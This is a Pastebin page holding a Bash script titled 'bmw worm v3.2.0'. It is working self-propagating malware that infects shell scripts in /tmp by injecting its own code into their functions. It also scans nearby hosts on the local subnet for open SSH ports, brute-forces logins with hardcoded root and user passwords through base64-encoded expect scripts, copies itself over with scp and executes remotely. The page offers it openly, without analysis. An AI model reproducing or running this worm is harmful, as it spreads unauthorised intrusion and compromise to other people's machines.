API tools faq
paste
FlyFar

bmw worm v3.2.0

FlyFar
Feb 26th, 2023
128
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 5.85 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #
  3. # bmw - the big master worm
  4. #
  5. # v320  by wzt  2019
  6. #
  7.  
  8. # bmw_phase1_start
  9. infect_dir="/tmp"
  10. infect_size=10
  11. infect_line=4
  12. infect_max_num=4
  13. infect_num=0
  14. infect_func_num=2
  15. infect_self_num=5
  16. infect_self_name=""
  17. infect_key_words="the big master worm."
  18.  
  19. bmw_find_scripts()
  20. {
  21.     local file file_sz func_num
  22.  
  23.     for file in `find $infect_dir -name "*.sh"`
  24.     do
  25.         [ $infect_num -gt $infect_max_num ] && break
  26.  
  27.         file_sz=`wc -c $file |awk '{print $1}'`
  28.         file_line=`wc -l $file |awk '{print $1}'`
  29.  
  30.         [[ $file_sz -lt $infect_size || $file_line -lt $infect_line ]] && continue
  31.  
  32.         func_num=`grep '^[a-zA-Z0-9_][^"]*()' $file|wc -l`
  33.         [ $func_num -lt $infect_func_num ] && continue
  34.  
  35.         if grep "$infect_key_words" $file >/dev/null; then
  36.             echo "$file has been infected."
  37.             continue
  38.         fi
  39.         echo "<$file_sz $file_line $func_num> infecting $file..."
  40.         bmw_infect_file $1 $file $func_num
  41.         ((infect_num++))
  42.     done
  43. }
  44. # bmw_phase1_end
  45.  
  46. # bmw_phase2_start
  47. bmw_infect_file()
  48. {
  49.     local rand_num i j k l
  50.     local phase_s phase_e
  51.  
  52.     rand_num=$((RANDOM%$3))
  53.     if [ $rand_num -eq 0 ]; then
  54.         rand_num=1
  55.     fi
  56.  
  57.     echo "$3 => $rand_num $2"
  58.  
  59.     phase_s="bmw_phase1_start"
  60.     phase_e="bmw_phase$infect_self_num""_end"
  61.  
  62.     bmw_extract_body "$1" "$phase_s" "$phase_e" "$2" $rand_num
  63. }
  64.  
  65. bmw_extract_body()
  66. {
  67.     local shellcode newcode
  68.  
  69.         shellcode=`awk -v phase_start="$2" -v phase_end="$3" 'BEGIN {phase_flag=0;phase_len=0}{if (phase_flag == 1) {phase_array[phase_len]=$0;phase_len++}if ($0 ~ phase_start) {phase_flag=1;phase_array[phase_len]=$0;phase_len++}if ($0 ~ phase_end) {phase_flag=0;}}END {for (i = 0; i < phase_len; i++) print phase_array[i]}' $1`
  70.  
  71.     shellcode1=$(echo "$shellcode"|sed 's/\\/\\\\/g')
  72.     newcode=`awk -v scode="$shellcode1" -v tnum="$5" 'BEGIN {func_flag=0;func_num=0}{if (func_flag == 1) {print $0; if ($0 ~ /^\}/) {func_flag=0;print scode}}else {if ($0 ~ /^[[:alnum:]].*\(\)/) {func_num++;if (func_num == tnum) {func_flag=1;}}print $0}}' $4`
  73.  
  74.     echo -e "$newcode"|sed 's/\\/\\\\/g' >$4.bak
  75.     rm -f $4 && mv $4.bak $4
  76.     chmod +x $4
  77. }
  78. # bmw_phase2_end
  79.  
  80. scp_crack_exp="IyEvdXNyL2Jpbi9leHBlY3QKCnNldCBJUCBbbGluZGV4ICRhcmd2IDJdCnNldCBVU0VSIFtsaW5k
  81. ZXggJGFyZ3YgMV0Kc2V0IFBBU1NXRCBbbGluZGV4ICRhcmd2IDVdCnNldCBMT0NBTF9GSUxFIFts
  82. aW5kZXggJGFyZ3YgMF0Kc2V0IFRJTUVPVVQgW2xpbmRleCAkYXJndiA0XQpzZXQgdGltZW91dCBb
  83. bGluZGV4ICRhcmd2IDRdCnNldCBSRU1PVEVfUEFUSCBbbGluZGV4ICRhcmd2IDNdCgpzcGF3biBz
  84. Y3AgLW8gU2VydmVyQWxpdmVJbnRlcnZhbD0kVElNRU9VVCAtbyBDb25uZWN0VGltZW91dD0kVElN
  85. RU9VVCAgJExPQ0FMX0ZJTEUgJFVTRVJAJElQOiRSRU1PVEVfUEFUSApleHBlY3QgewoJIih5ZXMv
  86. bm8pIiB7IHNlbmQgInllc1xyIjsgZXhwX2NvbnRpbnVlIH0KCSIqYXNzd29yZDoiIHsgc2VuZCAi
  87. JFBBU1NXRFxyIiB9CgkiUGFzc3dvcmQgZm9yIiB7IHNlbmQgIiRQQVNTV0RcciIgfQoJIk5hbWUg
  88. b3Igc2VydmljZSBub3Qga25vd24iIHsgZXhpdCAxfQoJIk5vIHJvdXRlIHRvIGhvc3QiIHsgZXhp
  89. dCAyIH0KCSJDb25uZWN0aW9uIHJlZnVzZWQiIHsgZXhpdCA5IH0KCSJMYXN0IGxvZ2luOiIgeyBl
  90. eGl0IDN9Cgl0aW1lb3V0IHsgZXhpdCA0IH0KCWVvZiB7IGV4aXQgMCB9Cn0KCmV4cGVjdCB7CiAg
  91. ICAgICAgIiphc3N3b3JkOiIgeyBleGl0IDUgfQoJIlBhc3N3b3JkIGZvciIgeyBleGl0IDggfQog
  92. ICAgICAgIGVvZiB7IGV4aXQgMCB9Cn0K"
  93.  
  94. ssh_crack_exp="IyEvdXNyL2Jpbi9leHBlY3QKCnNldCBJUCBbbGluZGV4ICRhcmd2IDBdCnNldCBVU0VSIFtsaW5k
  95. ZXggJGFyZ3YgMV0Kc2V0IFBBU1NXRCBbbGluZGV4ICRhcmd2IDJdCnNldCBDTUQgW2xpbmRleCAk
  96. YXJndiAzXQpzZXQgVElNRU9VVCBbbGluZGV4ICRhcmd2IDRdCnNldCB0aW1lb3V0IFtsaW5kZXgg
  97. JGFyZ3YgNF0KCnNwYXduIC1ub2VjaG8gc3NoIC1vIFNlcnZlckFsaXZlSW50ZXJ2YWw9JFRJTUVP
  98. VVQgLW8gQ29ubmVjdFRpbWVvdXQ9JFRJTUVPVVQgLXQgJFVTRVJAJElQICRDTUQKZXhwZWN0IHsK
  99. CSIoeWVzL25vKSIgeyBzZW5kICJ5ZXNcciI7IGV4cF9jb250aW51ZSB9CgkiKmFzc3dvcmQ6IiB7
  100. IHNlbmQgIiRQQVNTV0RcciIgfQoJIlBhc3N3b3JkIGZvciIgeyBzZW5kICIkUEFTU1dEXHIiIH0K
  101. CSJOYW1lIG9yIHNlcnZpY2Ugbm90IGtub3duIiB7IGV4aXQgMX0KCSJObyByb3V0ZSB0byBob3N0
  102. IiB7IGV4aXQgMiB9CgkiQ29ubmVjdGlvbiByZWZ1c2VkIiB7IGV4aXQgOSB9CgkiQ29ubmVjdGlv
  103. biByZXNldCBieSBwZWVyIiB7ZXhpdCA5fQoJdGltZW91dCB7IGV4aXQgNCB9Cgllb2YgeyBleGl0
  104. IDEwIH0KfQoKZXhwZWN0IHsKICAgICAgICAiKmFzc3dvcmQ6IiB7IGV4aXQgNSB9CgkiUGFzc3dv
  105. cmQgZm9yIiB7IGV4aXQgOCB9CiAgICAgICAgInVpZD0iIHsgZXhpdCAxMDAgfQoJIipdJCIgeyBl
  106. eGl0IDEwMCB9CgkiKl0jIiB7IGV4aXQgMTAwIH0KCSIqJCIgeyBleGl0IDEwMCB9CgkiKiMiIHsg
  107. ZXhpdCAxMDAgfQoJIkxhc3QgbG9naW46IiB7IGV4aXQgMTAwIH0KICAgICAgICBlb2YgeyBleGl0
  108. IDcgfQp9Cg=="
  109.  
  110. ssh_crack_user=("root" "wzt")
  111. ssh_crack_passwd=("123456" "111" "giveshell" "afafa" "afafdfafdf")
  112.  
  113. bmw_ssh_copy_file()
  114. {
  115.     ./scp_crack.exp $2 $user $1 "/tmp" 4 $passwd
  116.     [ $? -ne 0 ] && return
  117.     ./ssh_crack.exp $1 $user $passwd "cd /tmp;$2" 4
  118. }
  119.  
  120. bmw_ssh_crack()
  121. {
  122.     local user passwd ret
  123.  
  124.     for user in ${ssh_crack_user[*]}
  125.     do
  126.         for passwd in ${ssh_crack_passwd[*]}
  127.         do
  128.             ./ssh_crack.exp $1 $user $passwd "" 4
  129.             ret=$?
  130.             echo -e "\nretcode: $ret\n"
  131.             if [ $ret -eq 100 ]; then
  132.                 echo -ne "\ttrying $user => $passwd\t[success]\n"
  133.                 bmw_ssh_copy_file $1 $2 $user $passwd
  134.                 return
  135.             elif [ $ret -eq 9 ]; then
  136.                 break;
  137.             else
  138.                 echo -ne "\ttrying $user => $passwd\t[failed]\r"
  139.             fi
  140.         done
  141.     done
  142. }
  143.  
  144. bmw_crack_init()
  145. {
  146.     local bin old_ifs flag=0
  147.  
  148.     old_ifs=$IFS; IFS=':'
  149.     for bin in $PATH
  150.     do
  151.         [ -f $bin/expect ] && flag=1
  152.     done
  153.     IFS=$old_ifs
  154.  
  155.     [ $flag -ne 1 ] && return 1
  156.  
  157.     echo "$ssh_crack_exp"|base64 -d >ssh_crack.exp
  158.     [ -f ssh_crack.exp ] && chmod +x ssh_crack.exp
  159.  
  160.     echo "$scp_crack_exp"|base64 -d >scp_crack.exp
  161.     [ -f scp_crack.exp ] && chmod +x scp_crack.exp
  162.     return 0
  163. }
  164.  
  165. bmw_infect_net()
  166. {
  167.     local local_ip host ip
  168.  
  169.     local_ip=`env|grep -i SSH_CONNECTION|awk '{print $3}'`
  170.     host=`echo $local_ip|cut -d '.' -f 1-3`
  171.  
  172.     bmw_crack_init
  173.     [ $? -eq 1 ] && return 1
  174.  
  175.     for ((i = 136; i <= 138; i++))
  176.     do
  177.         ip="$host.$i"
  178.         echo -e "ping $ip"
  179.  
  180.         [ "$local_ip" == "$ip" ] && continue
  181.  
  182.         ping -W 1 -c 1 $ip >/dev/null
  183.         [ $? -eq 1 ] && continue
  184.  
  185.         exec 254<> /dev/tcp/$ip/22
  186.         [ $? -ne 0 ] && continue
  187.         echo "$ip port 22 is open."
  188.         exec 254<&-; exec 254>&-
  189.  
  190.         bmw_ssh_crack "$ip" $1
  191.     done
  192.  
  193. }
  194.  
  195. # bmw_phase5_start
  196. #bmw_find_scripts $0
  197. bmw_infect_net $0
  198. # bmw_phase5_end
Tags: BMW
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!